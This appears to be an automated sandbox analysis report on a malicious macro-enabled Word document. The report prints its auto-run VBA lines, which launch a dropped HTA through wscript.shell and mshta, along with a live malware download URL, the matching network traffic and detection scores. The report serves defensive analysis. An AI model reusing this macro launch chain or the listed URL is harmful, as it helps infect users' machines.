Source: http://shoulderelliottd.com/boolk/QlaJk8C6vYqIyEwbdypBHv3yJR/wrWWNCD/77427/bebys8?cid=Bm9cAP&wP8zhkK |
Avira URL Cloud: Label: malware |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Process created: C:\Windows\explorer.exe |
Source: global traffic |
TCP traffic: 192.168.2.22:49167 -> 194.62.42.144:80 |
Source: global traffic |
TCP traffic: 192.168.2.22:49167 -> 194.62.42.144:80 |
Source: mshta.exe, 00000003.00000002.474416428.00000000065D0000.00000004.00000001.sdmp |
String found in binary or memory: /moc.nideknil.wwwwww.linkedin.com equals www.linkedin.com (Linkedin) |
Source: mshta.exe, 00000003.00000002.474416428.00000000065D0000.00000004.00000001.sdmp |
String found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin) |
Source: mshta.exe, 00000003.00000002.473630093.0000000003367000.00000002.00020000.sdmp |
String found in binary or memory: http://localizability/practices/XML.asp |
Source: mshta.exe, 00000003.00000002.473630093.0000000003367000.00000002.00020000.sdmp |
String found in binary or memory: http://localizability/practices/XMLConfiguration.asp |
Source: explorer.exe, 00000001.00000002.410504275.0000000001CC0000.00000002.00020000.sdmp, explorer.exe, 00000002.00000002.411364891.0000000001DF0000.00000002.00020000.sdmp |
String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous. |
Source: mshta.exe, 00000003.00000002.473630093.0000000003367000.00000002.00020000.sdmp |
String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check |
Source: mshta.exe, 00000003.00000003.472292632.0000000005B00000.00000004.00000040.sdmp |
String found in binary or memory: http://shoulderelliottd.com/boolk/QlaJk8C6vYqIyEwbdypBHv3yJR/wrWWNCD/77427/bebys8?cid=Bm9cAP&wP8zhkK |
Source: mshta.exe, 00000003.00000002.473630093.0000000003367000.00000002.00020000.sdmp |
String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true |
Source: explorer.exe, 00000001.00000002.410504275.0000000001CC0000.00000002.00020000.sdmp, explorer.exe, 00000002.00000002.411364891.0000000001DF0000.00000002.00020000.sdmp |
String found in binary or memory: http://www.%s.comPA |
Source: mshta.exe, 00000003.00000002.473630093.0000000003367000.00000002.00020000.sdmp |
String found in binary or memory: http://www.icra.org/vocabulary/. |
Source: unknown |
DNS traffic detected: queries for: shoulderelliottd.com |
Source: instruct_11.21.doc.docm |
OLE, VBA macro line: dowYouKarol.exec "c:\windows\explorer " & dowGirlLoad |
|
Source: VBA code instrumentation |
OLE, VBA macro: Module ThisDocument, Function s, API IWshShell3.exec("c:\windows\explorer c:\users\public\powPowNext.hta") |
Name: s |
Source: instruct_11.21.doc.docm |
OLE, VBA macro line: Set dowYouKarol = CreateObject("wscript.shell") |
|
Source: VBA code instrumentation |
OLE, VBA macro: Module ThisDocument, Function s, String wscript: Set dowYouKarol = CreateObject("wscript.shell") |
Name: s |
Source: instruct_11.21.doc.docm |
OLE indicator has summary info: false |
Source: instruct_11.21.doc.docm |
OLE indicator application name: unknown |
Source: instruct_11.21.doc.docm |
OLE, VBA macro line: Sub document_open() |
|
Source: VBA code instrumentation |
OLE, VBA macro: Module ThisDocument, Function document_open |
Name: document_open |
Source: instruct_11.21.doc.docm |
OLE indicator, VBA macros: true |
Source: instruct_11.21.doc.docm |
Virustotal: Detection: 49% |
Source: unknown |
Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding |
|
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Process created: C:\Windows\explorer.exe c:\windows\explorer c:\users\public\powPowNext.hta |
|
Source: unknown |
Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding |
|
Source: C:\Windows\explorer.exe |
Process created: C:\Windows\SysWOW64\mshta.exe "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Public\powPowNext.hta" |
|
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Process created: C:\Windows\explorer.exe c:\windows\explorer c:\users\public\powPowNext.hta |
Jump to behavior |
Source: C:\Windows\explorer.exe |
Process created: C:\Windows\SysWOW64\mshta.exe "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Public\powPowNext.hta" |
Jump to behavior |
Source: classification engine |
Classification label: mal84.expl.winDOCM@6/16@1/1 |
Source: instruct_11.21.doc.docm |
OLE document summary: title field not present or empty |
Source: instruct_11.21.doc.docm |
OLE document summary: edited time not present or 0 |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Process created: C:\Windows\explorer.exe |
|
Source: unknown |
Process created: C:\Windows\explorer.exe |
|
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Process created: C:\Windows\explorer.exe |
Jump to behavior |
Source: Window Recorder |
Window detected: More than 3 window changes detected |
Source: instruct_11.21.doc.docm |
Initial sample: OLE summary keywords = ath.txeNwoPwop\cilbup\sresu\:c |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\explorer.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\explorer.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\explorer.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\explorer.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\mshta.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\mshta.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\mshta.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\mshta.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\mshta.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\mshta.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\mshta.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\mshta.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\mshta.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\explorer.exe TID: 2032 |
Thread sleep time: -60000s >= -30000s |
Jump to behavior |
Source: C:\Windows\explorer.exe TID: 2032 |
Thread sleep time: -60000s >= -30000s |
Jump to behavior |
Source: C:\Windows\explorer.exe TID: 2712 |
Thread sleep time: -60000s >= -30000s |
Jump to behavior |
Source: C:\Windows\SysWOW64\mshta.exe TID: 2808 |
Thread sleep time: -120000s >= -30000s |
Jump to behavior |
Source: explorer.exe, 00000002.00000003.408701243.000000000029B000.00000004.00000001.sdmp |
Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}] |
Source: C:\Windows\SysWOW64\mshta.exe |
Queries volume information: C:\Windows\Fonts\times.ttf VolumeInformation |
Jump to behavior |
Source: C:\Windows\SysWOW64\mshta.exe |
Queries volume information: C:\Windows\Fonts\times.ttf VolumeInformation |
Jump to behavior |
Source: C:\Windows\SysWOW64\mshta.exe |
Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation |
Jump to behavior |
Source: C:\Windows\SysWOW64\mshta.exe |
Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation |
Jump to behavior |
Source: C:\Windows\SysWOW64\mshta.exe |
Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation |
Jump to behavior |
Source: C:\Windows\SysWOW64\mshta.exe |
Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation |
Jump to behavior |
Source: C:\Windows\SysWOW64\mshta.exe |
Queries volume information: C:\Windows\Fonts\times.ttf VolumeInformation |
Jump to behavior |